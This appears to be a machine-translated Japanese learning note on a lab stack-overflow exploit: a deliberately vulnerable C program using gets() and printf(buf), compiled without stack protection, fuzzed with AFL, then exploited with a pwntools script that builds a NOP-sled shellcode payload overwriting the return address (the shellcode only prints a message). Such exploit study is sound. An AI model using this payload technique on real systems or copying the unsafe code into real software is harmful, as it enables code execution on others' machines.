関数の脆弱性実行コードを取得します

関数の脆弱性実行コードを取得します

---

最近AFLツールを学び、同時にgets関数の脆弱性をもとにコードを実行しました具体的な原理を分析する時間ができてから詳細な分析を行う予定です現在は記録を残すだけです. 主な内容はこちらです。

環境：kali 4.13.0-kali1-amd64

1. ツール peda をインストールします。

  コマンドラインで実行

• git clone https://github.com/longld/peda.git ~/peda
• echo “ソース ~/peda/peda.py” >> ~/.gdbinit

2. gdb でターゲット プログラムを開きます。

• ミニプログラムコード:

#include <stdio.h> 
#include <stdlib.h> 
#include <unistd.h> 
#include <string.h> 
#include <signal.h> 

int vuln(char *str)
{
    
    
    int len = strlen(str);
    if(str[0] == 'A' && len == 16)
    {
    
    
        raise(SIGSEGV);
        //如果输入的字符串的首字符为A并且长度为66，则异常退出
    }
    else if(str[0] == 'F' && len == 6)
    {
    
    
        raise(SIGSEGV);
        //如果输入的字符串的首字符为F并且长度为6，则异常退出
    }
    else
    {
    
    
        printf("it is good!\n");
    }
    return 0;
}

int main(int argc, char *argv[])
{
    
    
    char buf[32]={
    
    0};
    gets(buf);//存在栈溢出漏洞
    printf(buf);//存在格式化字符串漏洞
    vuln(buf);

    return 0;
}

• 次に、AFL-gcc でコンパイルします:
  afl-gcc -fno-stack-protector -z execstack c/vul.c -o ./vuln-new.
  注: ターゲット プログラムは afl-gcc でコンパイルする必要があり、コンパイル中に設定されます。:
  -fno-stack-protector -z execstack は、関連する保護コンパイル設定を無効にします。
• gdb ソース/vuln を実行
  し、gdb でデバッグして実行します: r
  

3. AFL-fuzz によって取得されたクラッシュを gdb デバッグの入力として使用します。

4. プログラムのクラッシュに関する詳細情報を取得します。

クラッシュの原因は SIGSEGV/セグメンテーション違反です。

5. 次に、crush によって入力されたデータを表示します。

crash のデータは gdb の RSP レジスタのデータと同じであることがわかり、指定された場所を変更して RSP レジスタの値を変更できます。

6. 分析のために gdb の関数の戻り点にブレークポイントを設定します。

7. 新しいプログラム入力ファイルを作成します。

• 最初の 40 文字は A (コマンド ライン実行: printf "%0.sA" {1…40} > test3)
• 中央の 6 文字は B (コマンド ライン実行: printf “%0.sB” {1…6} >> test3)
• 最後の 2 文字は '\0' (コマンド ライン実行: printf "%0.s\0" {1…2} >> test3)
• 最後の 112 文字は C (コマンド ライン実行: printf “%0.sC” {1…112} >> test3 )

8. hexdump を使用して以下を表示します。

9. test3 をプログラムの入力として使用すると、次の結果が得られます。

これは、プログラムが実行のためにアドレス 0x424242424242 (つまり、入力した BBBBBB) にジャンプすることを意味しますが、このアドレスは不正であるため、このアドレスをシェルコードのアドレスに置き換える必要があり、そうすればシェルコードを実行できるようになります。

10. シェルコードを構築するコードは次のとおりです。

import struct
from pwn import *
def generate_payload(start_addr,shellcode):
	context.arch='amd64'
	
	nop=asm('nop',arch='amd64')
	nop1=nop*40
	s_code=asm(shellcode)

	addr=struct.pack("<Q",start_addr)
	payload=nop1+addr+(nop*16)+s_code
	
	return payload

a=0x7fffffffe110
payload=generate_payload(a,shellcraft.amd64.linux.echo("hello,good job \n")+shellcraft.amd64.linux.exit())
# print(payload)

with open("./shellcode-new",'wb') as f:
	f.write(payload)
	print("generate successfully!")

変数 a の値はスタックの先頭のアドレスであり、シェルコード コードが実行されるアドレスです (コードはスタック上で実行されるため、対応するステーション保護設定を実行中にオフにする必要があるのはそのためです)コンパイル). マシンの場所に応じて決定する必要があります. アドレスは変更されます。

11. シェルコードを構築した後、hexdump を使用して以下を表示します。

12. 次に、gdb でプログラムの入力としてシェルコードを使用してプログラムを実行します (ret でブレークポイントを設定する必要があります)。

13. 実行ステータスは次のように取得されます。

この時点のスタック ビューは、

前の 16 進ダンプのシェルコードと一致しています。

14. この時点でスタックの最上位にあるデータはアドレス 0x00007fffffffe110 であることがわかります。

15. ブレークポイントが設定されているため、この時点では RIP=0x555555555190 です。

ret 操作を実行すると、スタックの最上位のデータが RIP に渡されるため、プログラムの実行パスは指定されたアドレス、つまりスタックに移動します。スタックはシェルコードであり、シェルコードが実行されます。 。

16. gdb にブレークポイントが設定されているため、プログラムは中断されますが、実行は gdb で続行されます。

17. 実行に成功しました。ブレークポイントをキャンセルして再実行すると、成功しました。